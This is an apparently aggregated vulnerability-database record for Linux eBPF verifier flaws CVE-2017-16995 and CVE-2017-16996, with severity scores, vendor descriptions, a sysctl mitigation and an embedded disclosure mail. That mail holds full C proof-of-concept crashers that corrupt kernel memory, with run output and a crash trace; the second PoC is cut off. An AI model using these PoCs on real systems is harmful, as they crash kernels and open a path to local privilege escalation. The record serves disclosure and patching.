kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging register truncation mishandling.
{"cve": [{"lastseen": "2022-03-23T14:54:24", "description": "kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging register truncation mishandling.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-27T17:08:00", "type": "cve", "title": "CVE-2017-16996", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16996"], "modified": "2018-01-09T17:48:00", "cpe": ["cpe:/o:debian:debian_linux:9.0", "cpe:/o:linux:linux_kernel:4.14.8"], "id": "CVE-2017-16996", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-16996", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.14.8:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*"]}], "redhatcve": [{"lastseen": "2022-07-07T11:11:20", "description": "An arbitrary memory r/w access issue was found in the Linux kernel compiled with the eBPF bpf(2) system call (CONFIG_BPF_SYSCALL) support. The issue could occur due to calculation errors in the eBPF verifier module, triggered by user supplied malicious BPF program. An unprivileged user could use this flaw to escalate their privileges on a system. Setting parameter \"kernel.unprivileged_bpf_disabled=1\" prevents such privilege escalation by restricting access to bpf(2) call.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-08T13:43:55", "type": "redhatcve", "title": "CVE-2017-16996", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16996"], "modified": "2022-07-07T09:15:05", "id": "RH:CVE-2017-16996", "href": "https://access.redhat.com/security/cve/cve-2017-16996", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2022-08-04T13:53:52", "description": "kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users\nto cause a denial of service (memory corruption) or possibly have\nunspecified other impact by leveraging register truncation mishandling.\n\n#### Bugs\n\n * <https://bugs.chromium.org/p/project-zero/issues/detail?id=1454>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[tyhicks](<https://launchpad.net/~tyhicks>) | Mitigation for this vulnerability is available by setting the kernel.unprivileged_bpf_disabled sysctl to 1: $ sudo sysctl kernel.unprivileged_bpf_disabled=1 $ echo kernel.unprivileged_bpf_disabled=1 | \\ sudo tee /etc/sysctl.d/90-CVE-2017-16995-CVE-2017-16996.conf\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-27T00:00:00", "type": "ubuntucve", "title": "CVE-2017-16996", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16995", "CVE-2017-16996"], "modified": "2017-12-27T00:00:00", "id": "UB:CVE-2017-16996", "href": "https://ubuntu.com/security/CVE-2017-16996", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-04T13:53:55", "description": "The check_alu_op function in kernel/bpf/verifier.c in the Linux kernel\nthrough 4.4 allows local users to cause a denial of service (memory\ncorruption) or possibly have unspecified other impact by leveraging\nincorrect sign extension.\n\n#### Bugs\n\n * <https://bugs.chromium.org/p/project-zero/issues/detail?id=1454>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[tyhicks](<https://launchpad.net/~tyhicks>) | Mitigation for this vulnerability is available by setting the kernel.unprivileged_bpf_disabled sysctl to 1: $ sudo sysctl kernel.unprivileged_bpf_disabled=1 $ echo kernel.unprivileged_bpf_disabled=1 | \\ sudo tee /etc/sysctl.d/90-CVE-2017-16995-CVE-2017-16996.conf \n[smb](<https://launchpad.net/~smb>) | Current breaks sha1 (taken from the fix patch) only makes 4.14+ affected. However upstream stable backported a fix for it. So I will modify the breaks sha1 to point to when the surrounding code was added.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-27T00:00:00", "type": "ubuntucve", "title": "CVE-2017-16995", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16995", "CVE-2017-16996"], "modified": "2017-12-27T00:00:00", "id": "UB:CVE-2017-16995", "href": "https://ubuntu.com/security/CVE-2017-16995", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-01-01T13:00:47", "description": "Exploit for linux platform in category dos / poc", "cvss3": {}, "published": "2017-12-22T00:00:00", "type": "zdt", "title": "Linux Kernel >= 4.9 eBPF memory corruption bugs Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-16995", "CVE-2017-16996"], "modified": "2017-12-22T00:00:00", "id": "1337DAY-ID-29285", "href": "https://0day.today/exploit/description/29285", "sourceData": "Hi!\r\n\r\nA few BPF verifier bugs in the Linux kernel, most of which can be used\r\nfor controlled memory corruption, have been fixed over the last days.\r\nOne of the bugs was introduced in 4.9, the others were only introduced\r\nin 4.14.\r\n\r\nThe fixes are in the net tree of the Linux kernel\r\n(https://git.kernel.org/pub/scm/linux/kernel/git/davem/net.git/log/kernel/bpf),\r\nbut not in Linus' tree yet.\r\n\r\nThe following bug was introduced in 4.9:\r\n\r\n=== fixed by \"bpf: fix incorrect sign extension in check_alu_op()\" ===\r\ncheck_alu_op() did not distinguish between\r\nBPF_ALU64|BPF_MOV|BPF_K (load 32-bit immediate, sign-extended to 64-bit)\r\nand BPF_ALU|BPF_MOV|BPF_K (load 32-bit immediate, zero-padded to 64-bit);\r\nit performed sign extension in both cases.\r\nDebian assigned CVE-2017-16995 for this issue.\r\n\r\n\r\nThe following bugs were introduced in 4.14:\r\n\r\n=== fixed by \"bpf/verifier: fix bounds calculation on BPF_RSH\" ===\r\nIncorrect signed bounds were being computed for BPF_RSH.\r\nIf the old upper signed bound was positive and the old lower signed bound was\r\nnegative, this could cause the new upper signed bound to be too low,\r\nleading to security issues.\r\n\r\n=== fixed by \"bpf: fix incorrect tracking of register size truncation\" ===\r\nThe BPF verifier did not properly handle register truncation to a smaller size.\r\n\r\nThe old code first mirrors the clearing of the high 32 bits in the bitwise\r\ntristate representation, which is correct. But then, it computes the new\r\narithmetic bounds as the intersection between the old arithmetic bounds and\r\nthe bounds resulting from the bitwise tristate representation. Therefore,\r\nwhen coerce_reg_to_32() is called on a number with bounds\r\n[0xffff'fff8, 0x1'0000'0007], the verifier computes\r\n[0xffff'fff8, 0xffff'ffff] as bounds of the truncated number.\r\nThis is incorrect: The truncated number could also be in the range [0, 7],\r\nand no meaningful arithmetic bounds can be computed in that case apart from\r\nthe obvious [0, 0xffff'ffff].\r\nDebian assigned CVE-2017-16996 for this issue.\r\n\r\n=== fixed by \"bpf: fix 32-bit ALU op verification\" ===\r\nadjust_scalar_min_max_vals() only truncates its inputs and otherwise operates on\r\n64-bit numbers while the BPF interpreter and JIT perform 32-bit arithmetic.\r\nThis means that the output of e.g. `(u32)0x40000000*(u32)5` will be incorrect.\r\nTo test this, you can use the following BPF code:\r\n\r\n BPF_MOV32_IMM(BPF_REG_1, 0x40000000),\r\n BPF_ALU32_IMM(BPF_MUL, BPF_REG_1, 5),\r\n BPF_EXIT_INSN()\r\n\r\nThe verifier generates the following output, which is incorrect:\r\n\r\n 0: R1=ctx(id=0,off=0,imm=0) R10=fp0\r\n 0: (b4) (u32) r1 = (u32) 1073741824\r\n 1: R1=inv1073741824 R10=fp0\r\n 1: (24) (u32) r1 *= (u32) 5\r\n 2: R1=inv5368709120 R10=fp0\r\n 2: (95) exit\r\n R0 !read_ok\r\n\r\n=== fixed by \"bpf: fix missing error return in check_stack_boundary()\" ===\r\ncheck_stack_boundary() prints an error into the verifier log, but doesn't\r\nexit, when a stack pointer doesn't have a known offset. This should be\r\nusable to get read+write access to spilled stack pointers.\r\n\r\n=== fixed by \"bpf: force strict alignment checks for stack pointers\" ===\r\nThe verifier did not force strict alignment checks for stack pointers, but\r\nthe tracking of stack spills relies on it; unaligned stack accesses can\r\nlead to corruption of spilled registers, which is exploitable.\r\n\r\n=== fixed by \"bpf: don't prune branches when a scalar is replaced with\r\na pointer\" ===\r\nThe BPF verifier pruned branches when a scalar is replaced with\r\na pointer, explicitly permitting confusing a pointer into a number\r\n(but not the other way around). This is a kernel pointer leak.\r\n\r\n=== fixed by \"bpf: fix integer overflows\" ===\r\nThere were various issues related to the limited size of integers used in\r\nthe verifier:\r\n - `off + size` overflow in __check_map_access()\r\n - `off + reg->off` overflow in check_mem_access()\r\n - `off + reg->var_off.value` overflow or 32-bit truncation of\r\n `reg->var_off.value` in check_mem_access()\r\n - 32-bit truncation in check_stack_boundary()\r\n\r\n\r\n\r\nCrash PoCs for some of these issues are at\r\nhttps://bugs.chromium.org/p/project-zero/issues/detail?id=1454,\r\nbut since oss-security prefers having PoCs in the mail directly, I've\r\npasted the PoCs below.\r\nFor the other issues, examples of how to trigger them are in the\r\nadded BPF selftests.\r\nThe rest of the mail is just PoC code, so if you're not interested\r\nin the PoCs, you can stop reading now.\r\n\r\n\r\n\r\n\r\n=== PoC for \"bpf: fix incorrect sign extension in check_alu_op()\" ===\r\nHere is a crasher that tries to write to a noncanonical address.\r\nNote that it is only designed to work on 4.14.\r\n\r\n======================================\r\n[email\u00a0protected]:~/bpf_range$ cat crasher_badimm.c\r\n#define _GNU_SOURCE\r\n#include <err.h>\r\n#include <stdint.h>\r\n#include <linux/bpf.h>\r\n#include <linux/filter.h>\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <sys/syscall.h>\r\n#include <asm/unistd_64.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n\r\n/* start from kernel */\r\n#define BPF_EMIT_CALL(FUNC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_JMP | BPF_CALL, \\\r\n .dst_reg = 0, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = (FUNC) }) /* ??? */\r\n#define BPF_MOV32_IMM(DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_MOV | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_REG_ARG1 BPF_REG_1\r\n#define BPF_REG_ARG2 BPF_REG_2\r\n#define BPF_REG_ARG3 BPF_REG_3\r\n#define BPF_REG_ARG4 BPF_REG_4\r\n#define BPF_REG_ARG5 BPF_REG_5\r\n#define BPF_PSEUDO_MAP_FD 1\r\n#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_LD | BPF_DW | BPF_IMM, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = (__u32) (IMM) }), \\\r\n ((struct bpf_insn) { \\\r\n .code = 0, /* zero is reserved opcode */ \\\r\n .dst_reg = 0, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = ((__u64) (IMM)) >> 32 })\r\n#define BPF_ALU32_IMM(OP, DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_OP(OP) | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_LD_MAP_FD(DST, MAP_FD) \\\r\n BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)\r\n#define BPF_ALU32_REG(OP, DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_OP(OP) | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_EXIT_INSN() \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_JMP | BPF_EXIT, \\\r\n .dst_reg = 0, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n/* Memory store, *(uint *) (dst_reg + off16) = src_reg */\r\n#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = OFF, \\\r\n .imm = 0 })\r\n#define BPF_REG_FP BPF_REG_10\r\n#define BPF_MOV64_REG(DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_MOV | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_ALU64_IMM(OP, DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_MOV64_REG(DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_MOV | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_REG_TMP BPF_REG_8\r\n#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = OFF, \\\r\n .imm = 0 })\r\n#define BPF_JMP_IMM(OP, DST, IMM, OFF) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_JMP | BPF_OP(OP) | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = OFF, \\\r\n .imm = IMM })\r\n#define BPF_MOV64_IMM(DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_MOV | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_ALU64_REG(OP, DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_MOV32_REG(DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_MOV | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n/* end from kernel */\r\n\r\n\r\nint bpf_(int cmd, union bpf_attr *attrs) {\r\n return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));\r\n}\r\n\r\nvoid array_set(int mapfd, uint32_t key, uint32_t value) {\r\n union bpf_attr attr = {\r\n .map_fd = mapfd,\r\n .key = (uint64_t)&key,\r\n .value = (uint64_t)&value,\r\n .flags = BPF_ANY,\r\n };\r\n\r\n\r\n int res = bpf_(BPF_MAP_UPDATE_ELEM, &attr);\r\n if (res)\r\n err(1, \"map update elem\");\r\n}\r\n\r\n\r\nint main(void) {\r\n union bpf_attr create_map_attrs = {\r\n .map_type = BPF_MAP_TYPE_ARRAY,\r\n .key_size = 4,\r\n .value_size = 8,\r\n .max_entries = 16\r\n };\r\n int mapfd = bpf_(BPF_MAP_CREATE, &create_map_attrs);\r\n if (mapfd == -1)\r\n err(1, \"map create\");\r\n\r\n\r\n array_set(mapfd, 1, 1);\r\n\r\n char verifier_log[100000];\r\n struct bpf_insn insns[] = {\r\n BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),\r\n\r\n // fill r0 with pointer to map value\r\n BPF_MOV64_REG(BPF_REG_TMP, BPF_REG_FP),\r\n BPF_ALU64_IMM(BPF_ADD, BPF_REG_TMP, -4), // allocate 4 bytes stack\r\n BPF_MOV32_IMM(BPF_REG_ARG2, 1),\r\n BPF_STX_MEM(BPF_W, BPF_REG_TMP, BPF_REG_ARG2, 0),\r\n BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_TMP),\r\n BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),\r\n BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),\r\n BPF_MOV64_REG(BPF_REG_0, 0), // prepare exit\r\n BPF_EXIT_INSN(), // exit\r\n\r\n // r1 = 0xffff'ffff, mistreated as 0xffff'ffff'ffff'ffff\r\n BPF_MOV32_IMM(BPF_REG_1, 0xffffffff),\r\n // r1 = 0x1'0000'0000, mistreated as 0\r\n BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, 1),\r\n // r1 = 0x1000'0000'0000'0000, mistreated as 0\r\n BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 28),\r\n\r\n // compute noncanonical pointer\r\n BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),\r\n\r\n // crash by writing to noncanonical pointer\r\n BPF_MOV32_IMM(BPF_REG_1, 0xdeadbeef),\r\n BPF_STX_MEM(BPF_W, BPF_REG_0, BPF_REG_1, 0),\r\n\r\n // terminate to make the verifier happy\r\n BPF_MOV32_IMM(BPF_REG_0, 0),\r\n BPF_EXIT_INSN()\r\n };\r\n union bpf_attr create_prog_attrs = {\r\n .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,\r\n .insn_cnt = sizeof(insns) / sizeof(insns[0]),\r\n .insns = (uint64_t)insns,\r\n .license = (uint64_t)\"\",\r\n .log_level = 2,\r\n .log_size = sizeof(verifier_log),\r\n .log_buf = (uint64_t)verifier_log\r\n };\r\n int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs);\r\n if (progfd == -1) {\r\n perror(\"prog load\");\r\n puts(verifier_log);\r\n return 1;\r\n }\r\n puts(\"ok so far?\");\r\n\r\n int socks[2];\r\n if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks))\r\n err(1, \"socketpair\");\r\n if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int)))\r\n err(1, \"setsockopt\");\r\n if (write(socks[1], \"a\", 1) != 1)\r\n err(1, \"write\");\r\n char c;\r\n if (read(socks[0], &c, 1) != 1)\r\n err(1, \"read res\");\r\n return 0;\r\n}\r\n[email\u00a0protected]:~/bpf_range$ gcc -o crasher_badimm crasher_badimm.c -Wall\r\n&& ./crasher_badimm\r\nok so far?\r\nSegmentation fault\r\n======================================\r\n\r\n\r\nHere is the resulting crash (note the corrupted heap address in R15):\r\n\r\n======================================\r\n[10599.403881] general protection fault: 0000 [#6] SMP KASAN\r\n[10599.403886] Modules linked in: binfmt_misc snd_hda_codec_generic\r\ncrct10dif_pclmul crc32_pclmul ghash_clmulni_intel snd_hda_intel\r\nsnd_hda_codec pcbc snd_hda_core qxl snd_hwdep snd_pcm snd_timer ttm\r\naesni_intel snd ppdev aes_x86_64 drm_kms_helper parport_pc crypto_simd\r\nsoundcore glue_helper drm parport evdev cryptd sg serio_raw pcspkr\r\nvirtio_console virtio_balloon button ip_tables x_tables autofs4 ext4\r\ncrc16 mbcache jbd2 fscrypto sr_mod cdrom sd_mod ata_generic 8139too\r\nehci_pci ata_piix uhci_hcd libata ehci_hcd 8139cp crc32c_intel mii\r\nvirtio_pci psmouse usbcore virtio_ring scsi_mod virtio i2c_piix4\r\nfloppy\r\n[10599.403952] CPU: 7 PID: 1610 Comm: crasher_badimm Tainted: G B D\r\n 4.15.0-rc1+ #4\r\n[10599.403954] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),\r\nBIOS 1.10.2-1 04/01/2014\r\n[10599.403957] task: 000000004ae6ce3e task.stack: 000000006149ccc2\r\n[10599.403963] RIP: 0010:___bpf_prog_run+0x1a77/0x2490\r\n[10599.403966] RSP: 0018:ffff8801ef6bf838 EFLAGS: 00010292\r\n[10599.403969] RAX: 0000000000000000 RBX: ffffc900016150b8 RCX: ffffffff866483d7\r\n[10599.403971] RDX: 0000000000000001 RSI: 0000000000000004 RDI: 0fff8801ac393b78\r\n[10599.403974] RBP: ffff8801ef6bf968 R08: 0000000000000000 R09: 0000000000000000\r\n[10599.403976] R10: 0000000000000001 R11: ffffed00358726b9 R12: ffffffff870be980\r\n[10599.403978] R13: 1ffff1003ded7f0e R14: 00000000deadbeef R15: 0fff8801ac393b78\r\n[10599.403981] FS: 00007fd705b43700(0000) GS:ffff8801f77c0000(0000)\r\nknlGS:0000000000000000\r\n[10599.403984] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\r\n[10599.403986] CR2: 0000561c31a24008 CR3: 00000001b153b002 CR4: 00000000001606e0\r\n[10599.403991] Call Trace:\r\n[10599.403997] ? sk_filter_trim_cap+0x5c/0x4e0\r\n[10599.404000] ? bpf_jit_compile+0x30/0x30\r\n[10599.404006] ? alloc_skb_with_frags+0x90/0x2c0\r\n[10599.404010] ? __bpf_prog_run32+0x83/0xc0\r\n[10599.404013] ? __bpf_prog_run64+0xc0/0xc0\r\n[10599.404017] ? sk_filter_trim_cap+0x5c/0x4e0\r\n[10599.404022] ? sk_filter_trim_cap+0xf7/0x4e0\r\n[10599.404028] ? unix_dgram_sendmsg+0x3e2/0x960\r\n[10599.404033] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[10599.404036] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[10599.404040] ? sock_alloc_inode+0x46/0x110\r\n[10599.404043] ? unix_stream_connect+0x840/0x840\r\n[10599.404046] ? __sock_create+0x7f/0x2c0\r\n[10599.404049] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[10599.404054] ? __lock_acquire.isra.31+0x2d/0xb40\r\n[10599.404059] ? __wake_up_common_lock+0xaf/0x130\r\n[10599.404065] ? unix_stream_connect+0x840/0x840\r\n[10599.404068] ? sock_sendmsg+0x6b/0x80\r\n[10599.404071] ? sock_write_iter+0x11d/0x1d0\r\n[10599.404075] ? sock_sendmsg+0x80/0x80\r\n[10599.404080] ? do_raw_spin_unlock+0x86/0x120\r\n[10599.404084] ? iov_iter_init+0x77/0xb0\r\n[10599.404089] ? __vfs_write+0x23e/0x340\r\n[10599.404092] ? kernel_read+0xa0/0xa0\r\n[10599.404098] ? __fd_install+0x5/0x160\r\n[10599.404102] ? __fget_light+0x9b/0xb0\r\n[10599.404107] ? vfs_write+0xe9/0x240\r\n[10599.404110] ? SyS_write+0xa7/0x130\r\n[10599.404121] ? SyS_read+0x130/0x130\r\n[10599.404125] ? lockdep_sys_exit+0x16/0x8e\r\n[10599.404129] ? lockdep_sys_exit_thunk+0x16/0x2b\r\n[10599.404133] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[10599.404138] Code: 00 48 0f bf 43 fa 49 01 c7 0f b6 43 f9 c0 e8 04\r\n0f b6 c0 4c 8d 74 c5 00 4c 89 f7 e8 04 4a 0f 00 4d 8b 36 4c 89 ff e8\r\n79 49 0f 00 <45> 89 37 e9 17 e6 ff ff 48 8d 7b 01 e8 58 47 0f 00 0f b6\r\n43 01\r\n[10599.404200] RIP: ___bpf_prog_run+0x1a77/0x2490 RSP: ffff8801ef6bf838\r\n[10599.404204] ---[ end trace e8c17e9abe81bd46 ]---\r\n======================================\r\n\r\n\r\n\r\n\r\n=== PoC for \"bpf: fix incorrect tracking of register size truncation\" ===\r\nHere is a crasher that uses this to again write to a noncanonical address:\r\n\r\n\r\n======================================\r\n#define _GNU_SOURCE\r\n#include <err.h>\r\n#include <stdint.h>\r\n#include <linux/bpf.h>\r\n#include <linux/filter.h>\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <sys/syscall.h>\r\n#include <asm/unistd_64.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n\r\n/* start from kernel */\r\n#define BPF_EMIT_CALL(FUNC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_JMP | BPF_CALL, \\\r\n .dst_reg = 0, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = (FUNC) }) /* ??? */\r\n#define BPF_MOV32_IMM(DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_MOV | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_REG_ARG1 BPF_REG_1\r\n#define BPF_REG_ARG2 BPF_REG_2\r\n#define BPF_REG_ARG3 BPF_REG_3\r\n#define BPF_REG_ARG4 BPF_REG_4\r\n#define BPF_REG_ARG5 BPF_REG_5\r\n#define BPF_PSEUDO_MAP_FD 1\r\n#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_LD | BPF_DW | BPF_IMM, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = (__u32) (IMM) }), \\\r\n ((struct bpf_insn) { \\\r\n .code = 0, /* zero is reserved opcode */ \\\r\n .dst_reg = 0, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = ((__u64) (IMM)) >> 32 })\r\n#define BPF_ALU32_IMM(OP, DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_OP(OP) | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_LD_MAP_FD(DST, MAP_FD) \\\r\n BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)\r\n#define BPF_ALU32_REG(OP, DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_OP(OP) | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_EXIT_INSN() \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_JMP | 